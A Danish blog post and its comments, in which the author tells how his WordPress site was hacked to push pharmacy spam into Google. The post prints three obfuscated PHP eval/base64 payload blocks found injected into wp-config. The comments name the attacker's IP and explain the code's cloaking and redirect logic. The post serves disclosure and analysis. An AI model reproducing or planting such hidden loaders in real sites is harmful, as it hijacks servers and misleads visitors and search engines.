Jeg er blevet hacket!

Jon Lund
4. august, 201125. februar, 2013

Se hackerens kode og læs hvordan den narrede Google og forvandlede mit site til en reklamesøjle for impotens- og hårtabs-piller og det der er værre.

De sidste par måneder har en hacker rodet rundt på mit site. Han har, som jeg kan se det, ikke ødelagt noget som sådan. Men han har lavet sine egne små og store blogposter, med indhold jeg absolut ikke selv ville kunne finde på. Om Levitra, Tramadol, Valium, Viagra, Adipex og meget andet godt fra skuffen af hårtabs-, impotens- og hvad har du af skumle piller.

Sådan så det ud:

Mit hackede site – sådan så det ud

Udover de nye sider, som hackeren har lavet, har han faktisk også haft gang i nogen af mine rigtige sider, ser det ud til. Ihvertfald kan man hos Google se spor efter at både min blog-forside og selve sitets forside m.fl. har været berørt. Men når jeg selv kiggede forbi var de fine igen – så hackeren har nok kun skrevet sine grimme ting længe nok til at han nåede målet: Google indekseringen.

Google narret: hackerens egentlige mål er at manipulere Google og skabe trafik til pille-butiks-sites

Sådan virker det: Når du klikker på et af links’ene til de hackede sider, bliver du automatisk sendt, ikke til jon-lund.com, men direkte til en af hackerens net-pille-butikker.

Men det er ikke denne nar-en-jon-lund.com-bruger ind på et viagra-site, der er meningen med hackeriet. Den er anderledes simpel: hackningen er et stort forsøg på at få hackerens egne køb-sjove-piller-sider højere op i Google.

Udover alle de sjove ord, var de hackede sider hos mig nemlig fulde af links og redirects. Redirects til pille-butiks-siderne og links til de andre hackede sider på mit site. Det første for at få Google til at tro, at pille-butiks-siderne er vældigt populære, siden så mange sites (alle os der var/er blevet hacket) sender besøg videre til dem. Det andet, for at få Google til at tro at også de hackede sider er vældigt centrale, som om det var rigtigt gode blog-poster, jeg ikke selv kunne lade være med at linke løs til. Hvis en bruger skulle søge hos Google efter et af de frække ord, ville hacker-pille-butikkerne derfor komme højt op på listen, fordi hackeriet havde narret Google til at tro, at pille-butikken var et kvalitets-site.

Netop tricket med at lade siderne blive gode igen efter de først var blevet hacket, forvirrede mig en del. Hos Google var der fæle overskrifter på mine artikler. Men når jeg så klikkede, var der ikke noget galt. Jeg tænkte først: er det Google der er blevet hacket og laver falske ting? Men nej. Det var mig selv.

Det fandt jeg ud af med god hjælp fra Kasper Bergholt, der har rimeligt godt forstand på hvordan man – i den gode sags tjeneste, forstås! – kommer til tops i Google – og fra Surftowns support-afdeling. Surftown kunne nemlig se at den centrale konfigurations-fil for hele min WordPress-system, wp-config, havde en mystisk kode sat ind øverst. Da den blev fjernet, forsvandt de hackede sider også. Særligt interesserede kan se strengen herunder.

Jeg har selvfølgelig også ændret mine passwords til alt hvad jeg har af ftp-, wordpress-admin mm. konti forbundet med bloggen. Og nu krydser jeg fingre og håber det bedste og venter på at Google skal glemme det grimme intermezzo igen, så intetanende ikke også fremover skal have deres billede af mig og mit site unødigt forstyrret.

Kode-interesseret? Her er den tekststreng med skadelige stoffer, der blev indsat i toppen af min wp-config-fil (du kan også downloade den her). Hvis du kan gennemskue hvad den egentligt gør, må du meget gerne skrive en kommentar!



<? eval(gzuncompress(base64_decode('eF6VVttu2kAQ/ZU VHIiVRXYBXVV8UAfMLXSVFDFt6pCvkApsSkKIcT  u6cXZuQ7lj0Zb2wZ25njmf91r359nl88/2HtRg6H8XQHgqxsH6Oxg8PSXWVJvvl8MMiX2Z/8uWVFYdelTreKrPevLdK/5jS0/F6SUCbwda6fvfKIisnTh7SqbePg8GGdqk9L0xIOpvAY05rSBbw22lF/iWSINI/g6LTqVfQI 6Lxyic03aTjOkxGvEWcZ82sEAWydiItothHIjScOKQlf8b/rBH5Cq0b5/yYNDjLOZV7gra7NPWMi yX1y 9H/mwGqfKv4kegQ4HyMJb3sSZUCATxduKrBfojOP8Yxly4E/2nE Q8mnfW88WR9TV9wj6oztiYyAHsisUS8tfPaNT2PG8FOC4R3qgy8ucoNMeUandOCBMK2wDaOVcx0Siu2SZBSV6HrZ/LKt7mfQM2UfDHahTYi8yI05IR9atv6BHpHqp6rZHqxwHq53L1Rc/ slcvyq5XIiFK9lYdB4XBb72KdzsVW9QqwV4triAP26/iGffmW4URn6lY6FTPl4lFmqUHWMaTR/yqazDr nOpCltOq2oAUxiqXrbzrynYiNVGUtVclUhtqn3i5ldUu6SCU7/BuCPskoZkToeEWGd/uZlnUEbdx1zIkc6JeTRSVvrgDcBbM p0ROhUoV6NJW8g3VRaQGV6lSMcMpIpbajZw59HrSaqdOtW44zbQ9rbVGOQU4GtUoC3nySK2o1idtZkxV58pFBt1I0h8hDBrMcJ JWqkD/d ZOxHJex6KDYtVZitkZJsUkgR9OWVRETNpm7sB7rCnRSrwlEWnAvV9ebFm6f9zK mfftl3DHPKAr1rLehX9F8WZn7AJLFIYHTar833Qq5uEDXF2OnQVMa8/ ob6hCz3zWaHaV/8MnMEURBzxx1X13GCu4r5Xcdu/I9YyeQ9qm7yfnUaDrtYLmp6lX3OtSolNhkQesl1akY6FNxmZWceOpWa98o0/dPWh7Bd7T9YvKBrgr6 pCn15/ AlPEQBQ='))); ?><? eval(gzuncompress(base64_decode('eF61WmmPslq2/iv94SR1Ts5NmvF0kc77wQnFEixRmTo3HQFLFLBMOcLN/e 99tobBwbr7XP7JmUsedZe87CB/XHcBof15/Yv/5Ql6fVv4qvC/frL rf/ WXxo/X1tch fVmkynFkX3g/nfx4 a XxcDkgu7naZRrF30tycZU4o2OJOiZkoeOmblTZeev5Y0nxH/1 lbqOtY 7Hi5ZyuZZ7sKsJiq5nyuKlNz7qnz2JrCpeG2HQWpevAcMwk2XLwQLDkUYAVZOePiQJinoaMp tTTLNWcOPxQNWGpaWnKvVLnHz9uArQZb8zhJ8gwrbk1s1TFmscxoRimZuKlKu8PzI rrC5/XvTVzLfVzXLq5a6dxO8TZKjPtNzozsm/gIJ9ytm1w2REUSRoneFrTL e Cj2xWHO1GRfP0udqXnQVw OcNn56SEfbU0pbCEUpknkicMI/nWFJPL7SU407VvCgkSEahkMhqegb20Wdo/8XPat48I2Ip ycG3j5DvtPUMDQTmwdeFgGIHRsS c8ad94UikUKy6XzjWAbmpR9dZISfH3AFyRKb8emFb5N gHyX FoKb8qD9nCmUeH15B7KOHpW1TBVQeRgtqVKBkBw90dpDJDJEE27RB8WYIFvmXHvIQ278oBIghfjIFTHCrgAa2ebOtaVCWCAY2cJpcwtboSole3 gM2JAjHOQKoWdZC24S6K 2UBqR0xvr69IS9uQXQwElS0mx7AfZb6QxMjO2ntOFLEguI7KL6gaYZ9kDl8YCCxOvo1rFoJ6gJwqouX31XxR2MmflqAruZpaEvN4kCYHX5AjF1xdpEFfjUHXXUB/ qmyh0DEHmUDvt37gscRCwTl5AmXBJlfONfxdoFoYvqk4HGab0tb/fSF12uGUqaL1ErC1ML8coyjmyocLqNfkIMhdV8gtndQ/hlqqqx9EZvHlDDqGXuSFExpV7QyloPzXjQhRLYcL6dtfWEPM9cZynDJIuWptjPPMXJ0Gwn15RQOTGJDKIYi6J8EK8pmgGlCQhw6wz1Uw5po0b/KIVfIGvLvIDmyWFiDcEcDp6EBkONueimYgjeOHk0HPw2RoXDhg20LMwJyFJgK16XE4N3O799XDHRA64t40JZTXzQSz96j/Y5BroaCtcZYsGLtWxGTHPaJTu1TsJ080CuZT2nnYhuYmTLqBAWdyoXS8PPk3xzjD0LSnUh3BH02CxrnCWS3DyXIJE84bwxdWITOQ WECYvU 8DYQNadw65kdNatlda5 /Q9GBAGlpY2CKOwE7FpcIk92/vynHgfCOrO6yR/604 cU1IqruviCOIJBQgrn2fFuv26 HWSECLxNtw6zfBOrqCEnuWNZ3OsVWdoBiOIAcK1uB9klAdGSaMlwRbKPV1/KV1tBQaZgb1k4ATs/epCXokxLKY8IbfuTf1eJg3l2EczS21/QGjom9aQ3X 8zJhpJx3b5mWXqedqlzlvE 1L3KdzBhCgz7oAm/RiBb2ZDc c2/ovwFX9Sn6cbX9cxM32A8z NAYD7P46nb4vI7EaygJrNnhyRdCSLPLIRDkV5rLlwimYwSzJYfG8kry7mOQRIv 68oXARMur64gHz8GYQIt/9Nzhq QwMmy34sWNJU06xC88 fUcXrKm3pYDhPu6825 E5XCYYJfwltK1vOuE bl1Jnut99qAV9q47 6tQgv63RbOz28DdWz0cjgU83CkbJ/jyaJeEbNd/YmMFok8BHy x8chhbfDPJ0NczjgcfIux0ZF/vcDLIupG5ktORJDtvNXNCEpmQ6MkzEuCy hkuRhOJdiaG6/mQwByB6yFcSVXmvsok/D4bzbzwqYDwyuUJxATUrt6oxJMC9Wx0xyXXeSCx9gK5/NSrjHSWEE4XxzofHyzyCAk3tkgiUF9UwncjsfPgMIYdIMLNnMaorvWck0tUruVEnL/pcRDGC3DK6nS6kWTM HpOxAG9zLi7XOKkb1oySSloEBc92UtEWMmN9yR2rt ETZs4PepUS3YZdy2iG4b6TuVHWONJ7B7gngAwDelGQ1ID1Q3DG5zpOalKw9fXFZ88kGDErab8eeTm fqUyytRJ2paRBDvPPHyTL8QVfXuLe3fypa1RCDhSDt6HqvM6LaJ66DGtXq178mGLO1rW9MjqYZx0/k6R QYlFmC dTQf0pkebNb78m4ZqHU xvU7dws9J7s8l0sN08txcYzo8VlsMzUN3PemVRhvgLThtPjCURWG7lbd1mftX2jw91WhRjOJ1VK610/3y4fKs0Oa917kl5YLHquNlfGHcl3lXHPrbYyiMPRTVOJexI6RsI/CRsjEey815AnIuqSsP5cy VKojf1ZhpV0pv12eRMrRtWvLwxgGxF87frVWE2v5DL6lK7E hddAJvWgJ2r7xd5ULmhE48LJCkQKF1JKhmjim1mUglYeMuy1Oyv6E5y5eb7SyWaPljBorUP9 TJN T8N SGN/rYnyvi/G9Lj9h9Ph7QVC0DT0FGlmEUdfLo x fPTksk/yuz3nHVSfmEyHWK5MlsnFuc3Lc8USFxs8Dh7YClV9QUco7rV65RSCHM3RDzNknpdDVgxjotpGFyur/xSsqf8B5uOZcQvuDIsyM65Ry7C66czjdSyfHrlLN7Cd9bDoYHeR0yYwoavMa4zBLRJCM 1W1ehnWosznXsptgY6YSKRzj eTX5cL8fkskCVn2TXgoa9KjIIeOS/mdxqXeOxFVC7Mr1oAxg3ymg2R62MrnuD4O4PGfYuNJ97FKLz2UiutkhjNotIN9rMzzSlWN7eQzHLNuq7l2LurGgv6xLt4vP1Mk16sEOg9sSUUUS9nFw1Ewp7KCRRpSfEC5JOnySMuypV2ro6SLxC6BQeE33GQrhiEN2xUE9rHK3H1h1EOz4bEONZrwrNMQ8MqjwoTGOPQdczukqnEGYMhhBtY/k209iONqRMabs N0McQi5PxeImDnMPL8fEBo71fAyGQRMLILJCZqZi2b/cSlzHLOrxdPZoMuY0bjmZz3CYSPqqKBI0k254AvTbrX6wORJoTO6bNzFlRnd1RtcsgpGPWz9uLUwjsvhSf6LzFBIYb9FaWf3AxJ0TlFW5yktwuX1RGFMlL80JWlOF3OBcWfkAc/WwTDO4VR3zNxjLvW52F3D4FK7bgdzDDRuDAjafw9/IrnkmcoOxBTyD1adwdZo wt sfuoWbP7P4Kd2421JHaxhNTQGlMFN2zkto7Xk1ifTFeafw8JTOMifwqtqfRE4Zm2xQfMCbvB5ATf4vIBrkgl7Pcc2NlW772DchzyBe9USfICrdt/DerX8H DnzCfPV0 qEXuAyxu6R3j nPm8QTWJbWoaZDO4iXkBV5nTsYj3sXm1SnDkz3EMFzfHt1vL7DbNemL1oc8jXLkxvYelyj67BH z qlqUvme4wrjtq3s0BJcs4G hyubdwpn9JFCpa8wmKNjpuJvtjuHyY4zVKo6lQ1kMt3n5RIo7j xE28m5fpiewO2bYAbh/pnBUiSNEP1DyEctnFvgBoeCdKHDW45aQuYPVDMGhgzmKtmxyNcr/GYbiuzp3CltZfgcot7hCvNuQTXRIg IcAddqsmMwkssi1MFe7RzaNavUEuIPr2o ox3OhB0nr1HqM3xXqx8659/HqFy/fvBZzTtGtgTm9Ie3JV8zu46Yb8BtfLLuCmu93ro dHh9JdMhQMvbkqy36AK2P83z6MwiisOWdNHU4dmHOZUJJX8uylL2MFa40Zb6pA1DNV7cnaEd36swMqxdfq/qvmFE7NJU34d14NKqePvnryB5f1wpa3moDmaTx7rTeNLh D9mvgWEmwTV6v524G u59GvnO2gvfsnjD3h46ndc70137svfF8IO80XcEj5xkIS/4vTTcvDwcIvDT62mSURpxvo3v4Kt0RreF92Z5K6MJkUFT56G5chDSfCSYp2CrnwjVHZtAtCDeVh5QpSDSB8YuSK0DedX goc6dp4tc3 CvpQ6 HOg/zHK0BXkzAILHriXnOs4Bv3ofHNSs5/QcFXZ WlC5Iz4vdFJuK/bupJkkk5WTFJKbs/m85q0rqr3qCGRgi/4LWm0bX y4yMPui5sc cLfHTng/Ea7 fvXcgcpQ3Agu7n6tF3JQeT8zSubXxpg3bkCfNVKKi51ifXzMRrlWNw92/twp78bnXae19QY8/GOgyE6BTyytFnZ7CqbilXey aOLyhznr4IOededey1HmSfMx5czqdy4MXcgDO CRxI4d2ILhfQc5dyIKOsvYFU36nTi39JMdumJYxOTnnilczZ31lQ05i YL0h9ZqKvj3Pqb27/CduPbk9/eBuQv7l Q9Rp BjcHrSGTXNufTom9FXld6BcHxciY9qERg4lB6pCAQrCzotHny3aCiK4BQ4UCErKCVZOHAivxOOwXnxuwkzfdZWdNO//OJWqPdyktxDTm6BfkYL5wh2IZJcjsnI6ehLW/CfnLy123RdSafkK9ckPb2xZmQ0YCeA1mKIfjBPIWZDPlmRLhmwxX0X9r6doJSWx8SPzVOwANMTrpQQmdfkBN/O/n0IOyhzZP/j6BW6jnDDLTdvWWt9f/ljOXPyrSsof5Gzu7Unq8kZ2rI9UOypOd7iO2EN561fJsdlLtDKo0fqE3urRN hgPzPF6/niq9WzR4cmiRRHWUGtvFTCFnkCJyDmuYnbfk80LPxEDy5q443AWDye//r XgOdEuLA41Qg/J2vnCwQ7WIVn429 /lofj1/Yv/mK//EP6Z7gMPsPlr78s/vHL r9/ /v//gsPGcQC'))); ?><? eval(gzuncompress(base64_decode('eF6Nmn9v20YShr KYgSJiPgCzuwPklWVa6/n9grkmoPj3D GIDi20hjx2YEsXy9w/d1vZ5ekOK 0tI1UFVe7s 8ud/eZGfKH57 8ffe3H9  P3259KZuPPumWb5cnJaL6frm7vpiWhbF7PmynC dtXUVqpShKJTQsISKyeucJVpMny/fHx3/  j4dNCEi0VoNCgwIzZ4MR3UtFJzj0lXLPb/4LGvaqQvI3rjEHk4xFpKzLCkkRKrpiE2c6qIpMirIpaiar5Z363Cl1r9FmdhWSq1ZKVBo q5ffV8vDHl/Gy9Pvs2jRfUXgyrVcXh8LLWl4265FJfkr5kfWn0pdWXTl96falVsVbFWpXRqoxWZbQqo1UZrcpoVUarMlqV0aqMVmW1KqtVWa3KalVWq7JaldWqrFZltSqrVTmtymlVTqtyWpXTqpxW5Xw8G4h315jTCp1W6LRCrxV6rdBrhV4r9Fqh1wq9njevVXmtymtVlVZVaVWVVlVpVZVWVWlVlVZVaVWVVlVpVbVWVWtVtVZVa1W1VlVrVbVWVWtVtVZVa1WNVtVoVY1W1WhVjVbVaFWNVtVoVY1W1WhVVJZwTXDNaQEbfYinM5isPlzLcAp/urs 31zeXE ulssyYCIcw/fh088/nV3drma/X918PLuayLE7u/w0zRHGKppRGUYcTQVbmRYOWvjUQj6qoOpmvTo7/yx6qsnZrfRfz9 Ez6YQFeHqTcfyFy/k1 aZHnAlXS 5nMtvs4/B2pfZQyigeTeUZ6v/fN18m0qlUDd0KF953pkVWPL3OfVeiMqUar16VdyPzE21yP5UL1L/h7kKTernVLpZFMWbTt6r8jU7 CjaGxchvF5t7tbXMjO G334G5bKbJg9KC0BniWsQIIVSLACieHawLWFawfXHq6B7Qh3oDsB3gn4TgB4AsITIJ6A8QSQJ6A8AeYJOE8AegLSE6CegPUEsCegPQHuCXhPAHwC4hMgn4D5BNAnoD4B9gm4TwB AvIToJ A/QTwJ6A/Af4J E/gABB4AORAH3CfAPwE5CdAPwH7CeBPQH8C/BPwn8ABIPAACFwAAh AwAkg8AII3AACP4DAESDwBAhcAQJfgMAZIPAGCNwBAn AwCEg8AgIXAICn4DAKSDwCgjcAgK/gMAxIPAMCFwDAt AwDkg8A4I3AMC/4DAQSDwEBg8BAYPgUsIcEqIcEoIcUqIcUoIckqIcoAfDPxg4AcDPxj4wcAPBn4w8IOBHwz8YOAHY3SI4eFOfAj6MELEEBFjRAwSMUrEMBH4wcAPBn4w8IOBHwz8YOAHAz8Y MHADwZ MPCDgR8M/GDgBwM/GPjBwA8GfjDwg4EfDPxg4AcDPxj4wcAPBn4w8IOBHwz8YOAHAz8Y MHADwZ MPCDgR8M/GDgBwM/GPjBwA8GfjDwg4EfDPxg4AcDPxj4wcAPBn4w8IOBHwz8YOAHAz8Y MHADwZ MPCDgR8M/GDgBwM/GPjBwA8GfjDwg4EfDPxg4IcBfhjghwF GOCHAX4Y4IcBfhjghwF GOCHAX4Y4IcBfhjghwF GOCHAX4Y4IcBfhjghwF GOCH4TZCVzlVwyaTATaBJ5kcsAloWUgEagfpUXbzbLhJ5f7EtQlMWoTIOylje7rQ2qpY7OdZuxSC eXPv749Wi4hAx5oNju/Oru9lfwC3f/3bB2iT656wW1B3RcM8xEkwW8ThAXm3T/ffL68/cubpZEQnptZdx3aSoXZw7AlTyUYNjxva4Uimxl6UyyKmA Q gU0MkFRHzQb1p2Y1ImZ7zUcNC 2eYxefMpmBAiPpQyI5UYZcxhrFq2CGNh3MXxKzyg9MsJA8/s Z8NmkEhh03bti7GezWJ6IJUODqOx4v6Jnbu28/BZ5ReKzhMZ8V1iM3kQEe9js10IvXLTpoCCZzE6aU4mzZZqt4VbGvMilvKiPIgyIsqWSVTYC9L6tMsLyYYzDZRK/gX/CzUfVmGa7rdWykHbsGC72UwjzsqrQJ6Nc1bnk0ZUQ4uYjQt WhH67Dejbzej5XYTWtN9sd0Xp7ajl n1251oWQbi 51ozXx6eXu72uzfaUaeWRV/3f9bVSy u767utKLqoo7zFZtMnLs5jcwZpmfXldaAttDZsQQl2CoGRqShVEna812sLbuFwK3YxwUla/98K96vKCbi75fJxPdqKxlcGtj1lIdL5bTTnHjO4XjA0wrJ2uo WyepndwY 1cfpnFqY8bf5tC3OYQbTVcTnW7nBy1i8fx/OX1zfXqpVpDdeg4eNR9Vy6/Lzkegs6o/Ry2JRAmxBcyMT9kzRh9Q0P8UczjqIpehHosasJ6mcnOHZtBm0/qsgtLIGfaFnqFN23KXfraNplPVCPXIyDtA7k5A0hRm7eXcjvfzqx4Da6E2YoPVJ2bpwUm3/IzF7PcId6ZjaqTVPvDaI20Y5wf6arquspXicly5w9/ nD89t2/TpYnv/7z6N2Hk8Nun5nXZvj32HUx1lcDfR0fnXw4/u3k Mff3v98dHw4moV/ZFZNmWyPdG oq/IQbWXrpR3i0g2SmjDx4YyIxdvjc7dSOAGwUq4703b3fTd t/33ZCNh5yQral HKFw93ZDJdPvVp8NKsVNZ4mL JtbRHZhCHiA5p0ttKrW61Elpv5x7F3BPZz7UnH68ubkqdm1Xe3us9/bYQI/qkKDtgzmXd65M8H92FUI6wUA6wUA6wUA6wfjgf oCl/c8TDwx5Llf7zXnaqYNX4lLooZKgwMx1xb8G /lRN uHbXNzeMF6XSqR7Zs0w4reXSTsQeh4D4EmHeHX7ZJ2O3h0Mj9ynAUhf8dtsd9romBJv84 vHv21OrGGlpx8 9SM18a/fICU3pzasw1VkTvj/5ej/D1bAbWKo0ndPSRztNMt0toqY7FRuZf1/m wQHWxJgYim 5TTSLPLIl6MwOIz9PzJmcF0l4SaGR dAYs/ts/ly 5zebL 67Ve//WplWOpVN1OVueRDRSn5YFKj3BAcrHrIAZoqhlQ vTg2YobADKRqKvc0Mwxm8AWo6mlmwHGExKOpmqeZgZgX8pOmps5M/w6C3Lr4 sFc7lz3ikG2g7jtqMyeyi5uKh/9QebwGRZBjAVDIc vV390uRZiUWLigGz3g0R97St/CsWeo/PJ0 LPP/tI6JejE7V aomHXrx4JgZj9RDRpTczJMl08PFmM7lYbVbnm9XF68lm/W1ydXN2MTkPn dfJmE Jl/Pfl/JCncHIsB3oiSMSBu0kjny0XbrS8/2pLDqlF7zlVZn2/wZ1nZ7a4f4tR06/BACtn5M6oe6yyzxONFcpCGalcxU95rLK6v hTlcnX  2W3UlJLOivcqZWweuiTEjromBU7Pcveu6e8dR9fDp7OV86Oo zdsX3Hw4MJ/xSEU9D9EEvhGK8omQZt8ErSJ78iqEp81U 3UjauoKnts MSNPs6uZK7Hbl30DUKt7J2SG5X1gzycnE06VGql0kpOPnYyvLPtfe135UP XtuSWhoOtmG/C29X66 Tu/DZ78XJH5ebz5Mvq2/fTVKTpbUH26WcHYw v23J6bWzFE5Puv7Wq4vLdehnsrmRrX2wZ1AVBW9szx20pYlbtuJ5 75a1Y0sMOf 6/ryejNR9dOb1WRgQsMxsfrf5WYaQ6zd6fKd0TZTsHdOg/PaongHqbasM2vQlk1uKVtK6cURmHh4bRweflh5 PEEJnkDZuDNXbJPM2PBjAMz/mlmHJiBd4GpfpoZD2b0gxkb37OLZka2s08nMYmLXRZ773v72t9OcXwHXr94aXnfy  WbTHbXars9i5V9sNd3y3a8Hd3nc5tqdB9D9Hc9nubuOnhE4wU 4RXen q38LxeHG5yk9Xnc Dee3XWo5HWxi7 B6dHjFezP4PfILqXw=='))); ?>

<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations:osv, osv…

Tags:Google hacking seo

11 tanker om “Jeg er blevet hacket!”

Christian Schmidt 4. august, 2011 kl. 17:30

Hej Jon,

Jeg kan ikke dekode den gzip’ede tekst. Er der mon opstået noget knas i forbindelse med, at du har copy-pastet koden ind i WordPress?
Morten S. Kirkegaard 4. august, 2011 kl. 17:45

Jeg har ikke reverset den til bunds, men det indsatte PHP-program henter indhold fra
http: // 212.95.54.63 / sutra / in.cgi (mellemrum indsat, Jon Lund))
Jon Lund 4. august, 2011 kl. 23:04

Christian, jeg har uploadet wp-config filen her: http://jon-lund.com/main/wp-content/uploads/wp-config_med_spam_php.txt

Måske går den mere rent igennem på den måde?
Jon Lund 4. august, 2011 kl. 23:06

OK, Morten – når jeg klikker på linket kommer jeg præcis til en af de pille-butikker jeg taler om (jeg er ikke sikker på om der er en eller flere, faktisk)
Tobias Vebel 5. august, 2011 kl. 00:27

Hej Jon

Jeg synes du bør redigere i Mortens kommentar, så linket bliver delt op med mellemrum eller lignende. På den måde bliver det ikke muligt at trykke på linket, og google vil derefter ikke indexere linket.
Det er lidt ironisk at fjerne den kode “hackerne” har placeret på siden, for at få vist deres link, og derefter linke til siden i en kommentar.
Jon Lund 5. august, 2011 kl. 06:40

Point taken, Tobias!
Monsar Ravnshoej 5. august, 2011 kl. 11:36

Hold da op, hvor må det være surt. Har du oplevet et fald i besøgende fra søgemaskinerne, efter alt er vendt tilbage til det gamle?
Troels Arvin 7. august, 2011 kl. 09:39

Kan det mon være relateret til følgende hul i noget funktionalitet til billede-skalering? http://www.h-online.com/open/news/item/Timthumb-PHP-script-opens-hole-in-WordPress-blogs-1317479.html
Jon Lund 7. august, 2011 kl. 12:28

Monsar: jeg har 10 % fald i organisk trafik fra Google de sidste 3 måneder sammenlignet med de tre foregående måneder. Men jeg er ikke sikker på at man skal lægge for meget i det – de sidste tre måneder er heftigt sommer-influerede.

Troels: Ja, måske – jeg bruger temaet Clean Home – måske bruger det Timthumb til billedskalering? Men jeg kan se at den onde kode i wp-config filen ikke er kommet igen (endnu).
Christian Schmidt 7. august, 2011 kl. 18:39

Jeg har prøvet at konvertere koden til noget mere forståeligt. Først lavede jeg en maskinel konvertering af de to store look-up-arrays ($GLOBALS[‘_638962699_’][$i] og _544873890($i)), og så har jeg manuelt erstattet intetsigende variable- og funktionsnavne med nogle mere forståelige samt fjernet død kode og yderligere tilrettet koden, så den blev mere læsbar (fx ændret “0.25+0.25+0.25+0.25” til “1” og lignende letgennemskuelige obfuskeringer).

Resultatet kan ses på http://aggemam.dk/jon-er-blevet-hacket

Jeg har ikke prøvet at køre koden (så vidt jeg kan se, er det dog harmløst – det er ikke en virus, der kan inficere andre systemer), så den virker sikkert ikke længere 100%, men det interessante er sådan set også at læse den.

Så vidt jeg kan se, er virkemåden groft sagt således:
– Hvis siden hentes af en søgemaskinerobot, da hentes noget indhold fra hackerens site, som sendes videre til robotten, dvs. at Google m.fl. ser noget andet end en almindelig besøgende på sitet. Det kan enten være en hel HTML-side (fx http://212.95. 54.63/dors/jon-lund/b97cfe26429ea56c8c8b12b9fc6d7689.html) eller bare nogle links (fx http://212.95. 54.63/dors/jon-lund/!spam_links.txt) der fører til nogle nyoprettede, “virtuelle” sider på dit site (fx http://jon-lund.com/main/page-237/).
– Hvis siden hentes af en bruger, der er ankommet til sitet ved at søge på et af de ord, der optræder i $spam_terms (“viagra” m.fl.), eller man besøger en af ovennævnte virtuelle sider, da bliver brugeren sendt direkte videre til hackerens site.
– I andre tilfælde end ovennævnte sker der ingenting. Dine sædvanlige læsere vil næppe ankomme til dit site ved at søge på viagra, og de vil heller ikke tilgå de “virtuelle” sider med spamindhold, idet URL’er ikke optræder andre steder end i søgemaskinerne. Så hverken du eller dine sædvanlige læsere vil ane uråd.

Koden er som nævnt ikke en orm, der selv kan inficere andre maskiner, så den må være kommet ind på dit site på anden vis.

Flere funktionaliteter optræder flere gange i koden. Jeg ved ikke, om dette har noget formål udover obfuskering. Jeg forstår heller ikke, hvad formålet er med at have tre forskellige måder at redirecte på. Sjovt nok kan man ved at sende en særlig User-Agent-header få scriptet til at udskrive debug-info.

Det IP-nummer, der optræder i koden, er hjemhørende i Tyskland. Det er måske ikke helt utænkeligt, at det danske politi vil gå ind i sagen (modsat hvis det hørte hjemme under fjernere himmelstrøg). Men der er selvfølgelig ikke noget bevis for, at hackeren, der har lagt scriptet på din server, har noget at gøre med ejeren af det site, der henvises til.
Jon Lund 8. august, 2011 kl. 21:25

Tak, Christian, for den grundige analyse. Meget betryggende at det ikke ser ud til at være ormeagtigt! Mvh Jon

Der er lukket for kommentarer.